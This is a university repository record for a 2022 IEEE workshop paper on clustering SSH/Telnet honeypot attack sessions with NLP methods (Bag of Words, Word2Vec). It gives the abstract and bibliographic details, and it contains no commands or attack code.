CINECA IRIS Institutional Research Information System

Honeypots are active sensors deployed to obtain information about attacks. In their search for vulnerabilities, attackers generate large volumes of logs, whose analysis is time consuming and cumbersome. We here evaluate whether Natural Language Processing (NLP) approaches can provide meaningful representations to find common traits in attackers' activity. We consider a widely used SSH/Telnet honeypot to record more than 200 000 sessions, including 61 000 unique shell scripts, some containing sequences of more than 100 Bash commands. We first parse the sessions to separate Bash commands, options and parameters. Next, we project each session in a metric space opposing two common tools used in NLP: Bag of Words and Word2Vec. Last, we leverage a clustering algorithm to aggregate the sessions while offering an instrumental representation of the clustering process. In the end, we obtain few tens of clusters that we analyze to explain the attackers' goals, i.e., obtain system information, inject malicious accounts, download and run executables, etc. Our work is a first step towards automatically identifying attack patterns on honeypots, thus effectively supporting security activities.

Towards NLP-based Processing of Honeypot Logs

Boffa, M;Milan, G;Vassio, L;Drago, I;Mellia, M;Ben Houidi, Z

2022-01-01

Abstract

Honeypots are active sensors deployed to obtain information about attacks. In their search for vulnerabilities, attackers generate large volumes of logs, whose analysis is time consuming and cumbersome. We here evaluate whether Natural Language Processing (NLP) approaches can provide meaningful representations to find common traits in attackers' activity. We consider a widely used SSH/Telnet honeypot to record more than 200 000 sessions, including 61 000 unique shell scripts, some containing sequences of more than 100 Bash commands. We first parse the sessions to separate Bash commands, options and parameters. Next, we project each session in a metric space opposing two common tools used in NLP: Bag of Words and Word2Vec. Last, we leverage a clustering algorithm to aggregate the sessions while offering an instrumental representation of the clustering process. In the end, we obtain few tens of clusters that we analyze to explain the attackers' goals, i.e., obtain system information, inject malicious accounts, download and run executables, etc. Our work is a first step towards automatically identifying attack patterns on honeypots, thus effectively supporting security activities.

Scheda breve

Scheda completa

Scheda completa (DC)

	Anno
	
				2022
			
	Titolo dell'evento
	
				IEEE European Symposium on Security and Privacy Workshops (EuroS&PW)
			
	Luogo dell'evento
	
				Genova, Italy
			
	Data dell'evento
	
				06-10 June 2022
			
	Titolo del volume
	
				Proceedings of the 2022 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW)
			
	Nome editore
	
				IEEE
			
	Pagine (da)
	
				314
			
	Pagine (a)
	
				321
			
	Codice ISBN
	
				978-1-6654-9560-8
			
	DOI
	
				https://dx.doi.org/10.1109/EuroSPW55150.2022.00038
			
	Parole Chiave
	
				Honeypots; NLP; Word2Vec; Bag of Words
			
	Tutti gli autori
	
						Boffa, M; Milan, G; Vassio, L; Drago, I; Mellia, M; Ben Houidi, Z
					
	Appare nelle tipologie:
	
				04A-Conference paper in volume

File in questo prodotto:

File	Dimensione	Formato
0_main.pdf Accesso aperto Descrizione: Articolo Tipo di file: PREPRINT (PRIMA BOZZA) Dimensione 738.47 kB Formato Adobe PDF Visualizza/Apri	738.47 kB	Adobe PDF	Visualizza/Apri

I documenti in IRIS sono protetti da copyright e tutti i diritti sono riservati, salvo diversa indicazione.

Utilizza questo identificativo per citare o creare un link a questo documento: https://hdl.handle.net/2318/1876801

Citazioni

ND

19

13

social impact